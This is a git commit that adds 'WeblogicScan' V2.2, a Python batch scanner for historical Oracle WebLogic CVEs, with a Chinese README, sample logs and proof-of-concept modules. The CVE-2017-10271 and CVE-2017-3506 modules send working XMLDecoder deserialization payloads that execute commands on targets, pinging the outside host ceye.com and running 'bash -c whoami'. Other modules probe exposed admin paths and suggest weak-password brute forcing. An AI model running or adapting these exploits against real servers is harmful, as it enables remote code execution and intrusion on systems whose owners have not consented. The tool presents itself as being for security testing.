upload about Weblogic

2026-05-09 22:37:49 +08:00 · 2019-08-31 10:33:26 +08:00
parent dd8e266065
commit 5150be44ae
17 changed files with 4584 additions and 0 deletions
@@ -0,0 +1,98 @@
+    软件作者：Tide_RabbitMask
+    免责声明：Pia!(ｏ ‵-′)ノ”(ノ﹏<。)
+    本工具仅用于安全测试，请勿用于非法使用，要乖哦~
+        
+    V2.2简介：
+    提供weblogic批量检测功能，收录几乎全部weblogic历史漏洞。
+    【没有遇到过weblogic批量检测工具的小朋友举起你的爪爪！】
+
+	PS：
+	综上:V2.*系列不是V1.*的升级版，只是多进程批量版本。
+	对于当个目标站点的检测，依然推荐您使用V1.*系列。
+	
+	V 2.*系列特色：
+        1.多进程任务高效并发
+        2.简洁直观的监控界面
+        3.健全的日志记录功能
+        4.健全的异常处理机制
+	
+	V 2.*功能详情：
+        #控制台路径泄露
+        Console  
+        
+        #SSRF：
+        CVE-2014-4210      
+        
+        #JAVA反序列化
+        CVE-2016-0638  
+        CVE-2016-3510   
+        CVE-2017-3248   
+        CVE-2018-2628 
+        CVE-2018-2893
+        CVE-2019-2725
+        CVE-2019-2729
+        
+        #任意文件上传
+        CVE-2018-2894   
+        
+        #XMLDecoder反序列化
+        CVE-2017-3506
+        CVE-2017-10271 
+        
+	V 2.1更新日志：
+        系列重新定义为WeblogicScanLot版本。
+        新增大量成熟POC，与V1.3保持一致。
+        同样新版本完全舍弃Python2。
+        日志功能重构，更加健壮实用。
+        Kill旧版本window下多进程适应性BUG
+	
+	V 2.2更新日志：
+        日志输出重做，之前的版本迁移导致日志并不适合作为批量扫描结果，
+        希望这次改动可以满足各位要求，如有bug issue继续安排~感谢！
+
+
+    【软件使用Demo】
+	【此处只提供了本机单机扫描demo，多线程实战场面太过血腥，请在家长陪同下自行体验】
+	
+	#控制台：
+    =========================================================================
+	__        __   _     _             _        ____
+	\ \      / /__| |__ | | ___   __ _(_) ___  / ___|  ___ __ _ _ __
+	 \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \
+	  \ V  V /  __/ |_) | | (_) | (_| | | (__   ___) | (_| (_| | | | |
+	   \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_|
+	                             |___/
+	                             By Tide_RabbitMask | V 2.2
+
+
+	Welcome To WeblogicScan !!!
+	Whoami：rabbitmask.github.io
+
+	[*]任务加载成功，目标:127.0.0.1:7001
+
+	[*]任务检测完成，目标:127.0.0.1:7001
+
+	>>>>>End of task
+
+    =========================================================================
+	
+	#日志文件：
+    =========================================================================
+	
+	2019-07-28 14:57:48,702 [+]127.0.0.1:7001 console address is exposed! The path is: http://127.0.0.1:7001/console/login/LoginForm.jsp Please try weak password blasting!
+	2019-07-28 14:57:48,717 [+]127.0.0.1:7001 UDDI module is exposed! The path is: http://127.0.0.1:7001/uddiexplorer/ Please verify the SSRF vulnerability!
+	2019-07-28 14:57:48,717 [-]127.0.0.1:7001 not detected CVE_2016_0638.
+	2019-07-28 14:57:48,717 [-]127.0.0.1:7001 not detected CVE_2016_3510.
+	2019-07-28 14:57:48,717 [-]127.0.0.1:7001 not detected CVE_2017_3248.
+	2019-07-28 14:57:48,725 [-]127.0.0.1:7001 not detected CVE-2017-3506.
+	2019-07-28 14:57:48,731 [-]127.0.0.1:7001 not detected CVE-2017-10271.
+	2019-07-28 14:57:48,731 [-]127.0.0.1:7001 not detected CVE_2018_2628.
+	2019-07-28 14:57:48,731 [-]127.0.0.1:7001 not detected CVE_2018_2893.
+	2019-07-28 14:57:48,735 [-]127.0.0.1:7001 not detected CVE-2018-2894.
+	2019-07-28 14:57:48,914 [+]127.0.0.1:7001 has a JAVA deserialization vulnerability:CVE-2019-2725.
+	2019-07-28 14:57:49,133 [+]And your current permission is:rabbitmask\rabbitmask.
+	2019-07-28 14:57:51,356 [+]127.0.0.1:7001 has a JAVA deserialization vulnerability:CVE-2019-2729.
+	2019-07-28 14:57:51,356 [+]And your current permission is:rabbitmask\rabbitmask.
+
+
+	=========================================================================
@@ -0,0 +1,14 @@
+2019-07-28 14:57:48,702 [+]127.0.0.1:7001 console address is exposed! The path is: http://127.0.0.1:7001/console/login/LoginForm.jsp Please try weak password blasting!
+2019-07-28 14:57:48,717 [+]127.0.0.1:7001 UDDI module is exposed! The path is: http://127.0.0.1:7001/uddiexplorer/ Please verify the SSRF vulnerability!
+2019-07-28 14:57:48,717 [-]127.0.0.1:7001 not detected CVE_2016_0638.
+2019-07-28 14:57:48,717 [-]127.0.0.1:7001 not detected CVE_2016_3510.
+2019-07-28 14:57:48,717 [-]127.0.0.1:7001 not detected CVE_2017_3248.
+2019-07-28 14:57:48,725 [-]127.0.0.1:7001 not detected CVE-2017-3506.
+2019-07-28 14:57:48,731 [-]127.0.0.1:7001 not detected CVE-2017-10271.
+2019-07-28 14:57:48,731 [-]127.0.0.1:7001 not detected CVE_2018_2628.
+2019-07-28 14:57:48,731 [-]127.0.0.1:7001 not detected CVE_2018_2893.
+2019-07-28 14:57:48,735 [-]127.0.0.1:7001 not detected CVE-2018-2894.
+2019-07-28 14:57:48,914 [+]127.0.0.1:7001 has a JAVA deserialization vulnerability:CVE-2019-2725.
+2019-07-28 14:57:49,133 [+]And your current permission is:rabbitmask\rabbitmask.
+2019-07-28 14:57:51,356 [+]127.0.0.1:7001 has a JAVA deserialization vulnerability:CVE-2019-2729.
+2019-07-28 14:57:51,356 [+]And your current permission is:rabbitmask\rabbitmask.
@@ -0,0 +1,137 @@
+#!/usr/bin/env python
+# _*_ coding:utf-8 _*_
+
+'''
+ ____       _     _     _ _   __  __           _
+|  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
+| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
+|  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   <
+|_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
+
+'''
+import logging
+import re
+from multiprocessing import Pool, Manager
+import poc.Console
+import poc.CVE_2014_4210
+import poc.CVE_2016_0638
+import poc.CVE_2016_3510
+import poc.CVE_2017_3248
+import poc.CVE_2017_3506
+import poc.CVE_2017_10271
+import poc.CVE_2018_2628
+import poc.CVE_2018_2893
+import poc.CVE_2018_2894
+import poc.CVE_2019_2725
+import poc.CVE_2019_2729
+
+logging.basicConfig(filename='Weblogic.log',
+                    format='%(asctime)s %(message)s',
+                    filemode="w", level=logging.INFO)
+
+version = "2.2"
+banner='''
+__        __   _     _             _        ____                  
+\ \      / /__| |__ | | ___   __ _(_) ___  / ___|  ___ __ _ _ __  
+ \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \ 
+  \ V  V /  __/ |_) | | (_) | (_| | | (__   ___) | (_| (_| | | | |
+   \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_|
+                             |___/ 
+                             By Tide_RabbitMask | V {} 
+'''.format(version)
+
+def board():
+    print (banner)
+    print('Welcome To WeblogicScan !!!\nWhoami：rabbitmask.github.io\n')
+    #懒得做交互了，大家自行变更path
+    path='ipresult.txt'
+    poolmana(path)
+
+
+def poolmana(path):
+    p = Pool(10)
+    q = Manager().Queue()
+    fr = open(path, 'r')
+    rtar = fr.readlines()
+    fr.close()
+    for i in range(len(rtar)):
+        ruleip=re.compile('(.*?):')
+        rip =(ruleip.findall(rtar[i]))[0]
+        ruleport=re.compile(':(.*)')
+        rport=ruleport.findall(rtar[i])[0]
+        p.apply_async(work,args=(rip,rport,q,))
+    p.close()
+    p.join()
+    print('>>>>>End of task\n')
+
+
+def work(rip,rport,q):
+    print ('[*]任务加载成功，目标:{}:{}\n'.format(rip,rport))
+    try:
+        poc.Console.run(rip, rport)
+    except:
+        logging.info ("[-]{}:{} console address not found.".format(rip,rport))
+
+    try:
+        poc.CVE_2014_4210.run(rip,rport)
+    except:
+        logging.info ("[-]{}:{} not detected CVE_2014_4210.".format(rip,rport))
+
+    try:
+        poc.CVE_2016_0638.run(rip,rport,0)
+    except:
+        logging.info ("[-]{}:{} not detected CVE_2016_0638.".format(rip,rport))
+
+    try:
+        poc.CVE_2016_3510.run(rip, rport, 0)
+    except:
+        logging.info ("[-]{}:{} not detected CVE_2016_3510.".format(rip,rport))
+
+    try:
+        poc.CVE_2017_3248.run(rip, rport, 0)
+    except:
+        logging.info ("[-]{}:{} not detected CVE_2017_3248.".format(rip,rport))
+
+    try:
+        poc.CVE_2017_3506.run(rip, rport, 0)
+    except:
+        logging.info ("[-]{}:{} not detected CVE_2017_3506.".format(rip,rport))
+
+    try:
+        poc.CVE_2017_10271.run(rip, rport, 0)
+    except:
+        logging.info("[-]{}:{} not detected CVE_2017_10271.".format(rip,rport))
+
+    try:
+        poc.CVE_2018_2628.run(rip, rport, 0)
+    except:
+        logging.info("[-]{}:{} not detected CVE_2018_2628.".format(rip,rport))
+
+    try:
+        poc.CVE_2018_2893.run(rip, rport, 0)
+    except:
+        logging.info("[-]{}:{} not detected CVE_2018_2893.".format(rip,rport))
+
+    try:
+        poc.CVE_2018_2894.run(rip, rport, 0)
+    except:
+        logging.info("[-]{}:{} not detected CVE_2018_2894.".format(rip,rport))
+
+    try:
+        poc.CVE_2019_2725.run(rip, rport, 0)
+    except:
+        logging.info("[-]{}:{} not detected CVE_2019_2725.".format(rip,rport))
+
+    try:
+        poc.CVE_2019_2729.run(rip, rport, 0)
+    except:
+        logging.info("[-]{}:{} not detected CVE_2019_2729.".format(rip,rport))
+
+    print ('[*]任务检测完成，目标:{}:{}\n'.format(rip,rport))
+    q.put(rip)
+
+def run():
+    board()
+
+if __name__ == '__main__':
+    run()
@@ -0,0 +1 @@
+127.0.0.1:7001
@@ -0,0 +1,36 @@
+#!/usr/bin/env python3
+# _*_ coding:utf-8 _*_
+'''
+ ____       _     _     _ _   __  __           _    
+|  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
+| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
+|  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   < 
+|_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
+
+'''
+import logging
+import sys
+import requests
+
+logging.basicConfig(filename='Weblogic.log',
+                    format='%(asctime)s %(message)s',
+                    filemode="w", level=logging.INFO)
+
+headers = {'user-agent': 'ceshi/0.0.1'}
+
+def islive(ur,port):
+    url='http://' + str(ur)+':'+str(port)+'/uddiexplorer/'
+    r = requests.get(url, headers=headers)
+    return r.status_code
+
+def run(url,port):
+    if islive(url,port)==200:
+        u='http://' + str(url)+':'+str(port)+'/uddiexplorer/'
+        logging.info('[+]{}:{} UDDI module is exposed! The path is: {} Please verify the SSRF vulnerability!'.format(url,port,u))
+    else:
+        logging.info("[-]{}:{} UDDI module default path does not exist!".format(url,port))
+
+if __name__=="__main__":
+    url = sys.argv[1]
+    port = int(sys.argv[2])
+    run(url,port)
@@ -0,0 +1,72 @@
+#!/usr/bin/env python3
+# _*_ coding:utf-8 _*_
+'''
+ ____       _     _     _ _   __  __           _
+|  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
+| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
+|  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   <
+|_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
+
+'''
+import sys
+import requests
+import re
+import logging
+
+logging.basicConfig(filename='Weblogic.log',
+                    format='%(asctime)s %(message)s',
+                    filemode="w", level=logging.INFO)
+
+VUL=['CVE-2017-10271']
+headers = {'user-agent': 'ceshi/0.0.1'}
+
+def poc(url,index):
+    rurl=url
+    if not url.startswith("http"):
+        url = "http://" + url
+    if "/" in url:
+        url += '/wls-wsat/CoordinatorPortType'
+    post_str = '''
+    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+      <soapenv:Header>
+        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+          <java>
+            <void class="java.lang.ProcessBuilder">
+              <array class="java.lang.String" length="2">
+                <void index="0">
+                  <string>/usr/sbin/ping</string>
+                </void>
+                <void index="1">
+                  <string>ceye.com</string>
+                </void>
+              </array>
+              <void method="start"/>
+            </void>
+          </java>
+        </work:WorkContext>
+      </soapenv:Header>
+      <soapenv:Body/>
+    </soapenv:Envelope>
+    '''
+
+    try:
+        response = requests.post(url, data=post_str, verify=False, timeout=5, headers=headers)
+        response = response.text
+        response = re.search(r"\<faultstring\>.*\<\/faultstring\>", response).group(0)
+    except Exception:
+        response = ""
+
+    if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
+        logging.info('[+]{} has a JAVA deserialization vulnerability:{}.'.format(rurl,VUL[index]))
+    else:
+        logging.info('[-]{} not detected {}.'.format(rurl,VUL[index]))
+
+
+def run(rip,rport,index):
+    url=rip+':'+str(rport)
+    poc(url=url,index=index)
+
+if __name__ == '__main__':
+    dip = sys.argv[1]
+    dport = int(sys.argv[2])
+    run(dip,dport,0)
@@ -0,0 +1,75 @@
+#!/usr/bin/env python3
+# _*_ coding:utf-8 _*_
+'''
+ ____       _     _     _ _   __  __           _    
+|  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
+| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
+|  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   < 
+|_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
+
+'''
+import sys
+import requests
+import re
+import logging
+
+logging.basicConfig(filename='Weblogic.log',
+                    format='%(asctime)s %(message)s',
+                    filemode="w", level=logging.INFO)
+
+VUL=['CVE-2017-3506']
+headers = {'user-agent': 'ceshi/0.0.1'}
+
+def poc(url,index):
+    rurl=url
+    if not url.startswith("http"):
+        url = "http://" + url
+    if "/" in url:
+        url += '/wls-wsat/CoordinatorPortType'
+    post_str = '''
+    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+      <soapenv:Header>
+        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+          <java>
+            <object class="java.lang.ProcessBuilder">
+              <array class="java.lang.String" length="3">
+                <void index="0">
+                  <string>/bin/bash</string>
+                </void>
+                <void index="1">
+                  <string>-c</string>
+                </void>
+				<void index="2">
+                  <string>whoami</string>
+                </void>
+              </array>
+              <void method="start"/>
+            </object>
+          </java>
+        </work:WorkContext>
+      </soapenv:Header>
+      <soapenv:Body/>
+    </soapenv:Envelope>
+    '''
+
+    try:
+        response = requests.post(url, data=post_str, verify=False, timeout=5, headers=headers)
+        response = response.text
+        response = re.search(r"\<faultstring\>.*\<\/faultstring\>", response).group(0)
+    except Exception:
+        response = ""
+
+    if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
+        logging.info('[+]{} has a JAVA deserialization vulnerability:{}.'.format(rurl,VUL[index]))
+    else:
+        logging.info('[-]{} not detected {}.'.format(rurl,VUL[index]))
+
+
+def run(rip,rport,index):
+    url=rip+':'+str(rport)
+    poc(url=url,index=index)
+
+if __name__ == '__main__':
+    dip = sys.argv[1]
+    dport = int(sys.argv[2])
+    run(dip,dport,0)
@@ -0,0 +1,36 @@
+#!/usr/bin/env python3
+# _*_ coding:utf-8 _*_
+'''
+ ____       _     _     _ _   __  __           _
+|  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
+| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
+|  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   <
+|_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
+
+'''
+import logging
+import sys
+import requests
+
+logging.basicConfig(filename='Weblogic.log',
+                    format='%(asctime)s %(message)s',
+                    filemode="w", level=logging.INFO)
+
+VUL=['CVE-2018-2894']
+headers = {'user-agent': 'ceshi/0.0.1'}
+
+def islive(ur,port):
+    url='http://' + str(ur)+':'+str(port)+'/ws_utc/resources/setting/options/general'
+    r = requests.get(url, headers=headers)
+    return r.status_code
+
+def run(url,port,index):
+    if islive(url,port)!=404:
+        logging.info('[+]{}:{} has a JAVA deserialization vulnerability:{}.'.format(url,port,VUL[index]))
+    else:
+        logging.info('[-]{}:{} not detected {}.'.format(url,port,VUL[index]))
+
+if __name__=="__main__":
+    url = sys.argv[1]
+    port = int(sys.argv[2])
+    run(url,port,0)
@@ -0,0 +1,36 @@
+#!/usr/bin/env python3
+# _*_ coding:utf-8 _*_
+'''
+ ____       _     _     _ _   __  __           _    
+|  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
+| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
+|  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   < 
+|_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
+
+'''
+import logging
+import sys
+import requests
+
+logging.basicConfig(filename='Weblogic.log',
+                    format='%(asctime)s %(message)s',
+                    filemode="w", level=logging.INFO)
+
+headers = {'user-agent': 'ceshi/0.0.1'}
+
+def islive(ur,port):
+    url='http://' + str(ur)+':'+str(port)+'/console/login/LoginForm.jsp'
+    r = requests.get(url, headers=headers)
+    return r.status_code
+
+def run(url,port):
+    if islive(url,port)==200:
+        u='http://' + str(url)+':'+str(port)+'/console/login/LoginForm.jsp'
+        logging.info("[+]{}:{} console address is exposed! The path is: {} Please try weak password blasting!".format(url,port,u))
+    else:
+        logging.info('[-]{}:{} console address not found!'.format(url,port))
+
+if __name__=="__main__":
+    url = sys.argv[1]
+    port = int(sys.argv[2])
+    run(url,port)
@@ -0,0 +1,10 @@
+#!/usr/bin/env python3
+# _*_ coding:utf-8 _*_
+'''
+ ____       _     _     _ _   __  __           _
+|  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
+| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
+|  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   <
+|_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
+
+'''